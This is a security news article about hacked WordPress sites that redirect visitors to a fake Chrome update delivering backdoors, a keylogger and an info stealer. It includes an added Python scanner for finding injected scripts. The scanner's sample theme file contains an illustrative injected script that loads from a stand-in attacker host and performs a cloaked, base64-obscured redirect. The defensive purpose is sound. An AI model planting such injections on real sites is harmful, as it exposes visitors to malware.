Compromised WordPress sites being used to serve malware is nothing new in computer security.
Some campaigns, however, are more serious than others, and this is one of them. Hacked corporate websites and news blogs running on WordPress are currently being used by attackers to deliver backdoor malware.
The backdoor opens the door to further payloads, including information stealers, various Trojans and keylogging software. The lure used to get it onto victims' machines is a fake Chrome update.
Hacked WordPress Sites – a March 2020 Malicious Campaign
The campaign starts with the attackers gaining administrator access to the targeted WordPress sites and blogs. Once in, they inject malicious JavaScript that redirects visitors to the fake Chrome update page.
Instead of an update, victims download a malicious installer that hands control of the computer to the attackers through a TeamViewer installation. Once TeamViewer is installed on the compromised system, two password-protected self-extracting (SFX) archives of malicious files are unpacked. They contain the files needed to open the fake update page and to enable remote connections, and a script that bypasses Windows' built-in protections is also run.
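The article does not publish the injected script itself, so the following is an added example, not code from the article or from Dr. Web, of how a site owner can hunt for the kind of injection described above: script tags loaded from a host other than the site's own, inline scripts that use obfuscation primitives such as atob or eval, and client-side redirects that fire only for some visitors (the sort of cloaking used to send Windows users to a fake update page). The site hostname, the sample header.php and the attacker-looking domains in it are constructed for illustration and are not indicators from the campaign.

```python
import os
import re
from urllib.parse import urlparse

# Assumed: the hostname of the WordPress site being inspected (not from the article).
SITE_HOST = "example.com"

# <script ...>body</script>, attributes and body captured separately
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)
# window.location = X / location.href = X / location.replace(X); (?!=) skips == comparisons
REDIRECT_RE = re.compile(
    r"(?:window\.location(?:\.href)?|document\.location|location\.href|top\.location)"
    r"\s*=(?!=)\s*([^;\n]+)"
    r"|location\.replace\s*\(\s*([^)]+)\)",
    re.I,
)
# primitives injected scripts commonly use to hide a URL or payload
OBFUSCATION_RE = re.compile(r"\b(?:eval|unescape|atob)\s*\(|String\.fromCharCode", re.I)
# signals that a redirect is shown only to some visitors (cloaking)
CLOAKING_RE = re.compile(r"navigator\.userAgent|document\.referrer|document\.cookie", re.I)


def host_of(url):
    """Hostname of an absolute or protocol-relative URL; None for relative paths or non-URLs."""
    if url.startswith("//"):
        url = "https:" + url
    hostname = urlparse(url).hostname
    return hostname.lower() if hostname else None


def scan_scripts(html, site_host=SITE_HOST):
    """Return a list of (reason, snippet) for script tags that look injected."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = host_of(src.group(1))
            if host and host != site_host:
                findings.append(("external script source", src.group(1)))
            continue
        body = body.strip()
        if not body:
            continue
        if OBFUSCATION_RE.search(body):
            findings.append(("obfuscation primitive in inline script", body[:80]))
        for match in REDIRECT_RE.finditer(body):
            target = (match.group(1) or match.group(2)).strip().strip("\"'")
            if host_of(target) == site_host:
                continue  # a literal redirect to the site itself, e.g. a canonical URL
            reason = "client-side redirect to non-local target"
            if CLOAKING_RE.search(body):
                reason = "conditional (cloaked) redirect to non-local target"
            findings.append((reason, target))
    return findings


def scan_tree(root, site_host=SITE_HOST, exts=(".php", ".js", ".html")):
    """Run scan_scripts over every theme/plugin file under root; returns {path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_scripts(fh.read(), site_host)
                if hits:
                    report[path] = hits
    return report


# Constructed sample of a theme header.php after an injection (not a real indicator).
# The base64 string decodes to https://chrome-update-example.net/update, a made-up URL.
SAMPLE_HEADER_PHP = """<!DOCTYPE html>
<html>
<head>
<?php wp_head(); ?>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://example.com/wp-content/themes/twentytwenty/assets/js/index.js"></script>
<script>document.documentElement.className = 'js';</script>
<script src="https://cdn.attacker-example.net/update.js"></script>
<script>
var u = atob("aHR0cHM6Ly9jaHJvbWUtdXBkYXRlLWV4YW1wbGUubmV0L3VwZGF0ZQ==");
if (navigator.userAgent.indexOf("Windows") > -1) { window.location = u; }
</script>
</head>
"""

if __name__ == "__main__":
    for reason, snippet in scan_scripts(SAMPLE_HEADER_PHP):
        print(f"{reason}: {snippet}")
```

Run scan_tree over wp-content/themes and wp-content/plugins, and also feed scan_scripts the post_content and option_value columns dumped from the database, since an attacker with admin access can just as easily store the script in a post, a widget or a theme option as in a file. Anything flagged should be compared against a clean copy of the theme or plugin from WordPress.org before it is removed, because a legitimate third-party widget will also trip the external-source check.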
What malware is downloaded onto compromised systems?
- The X-Key Keylogger;
- The Predator The Thief information stealer;
- A Trojan providing remote control over the RDP protocol.
Who is behind these campaigns?
Security researchers at Dr. Web believe these are the same threat actors who previously spread a fake installer of the popular VSDC video editor through its official website and the CNET download platform.
An earlier campaign, uncovered in August 2019, used vulnerable WordPress plugins to break into websites. Several popular plugins were found to contain security flaws that let attackers take control of the targeted sites and infect them with malware.
The exploited plugins included Simple 301 Redirects – Addon – Bulk Uploader and several developed by NicDark. To stay clear of such campaigns, WordPress site owners should keep strict update hygiene: WordPress core, themes and plugins should all be updated promptly, and any plugin no longer needed should be removed rather than left installed. Since the current campaign begins with administrator access, admin accounts also need strong, unique passwords and two-factor authentication.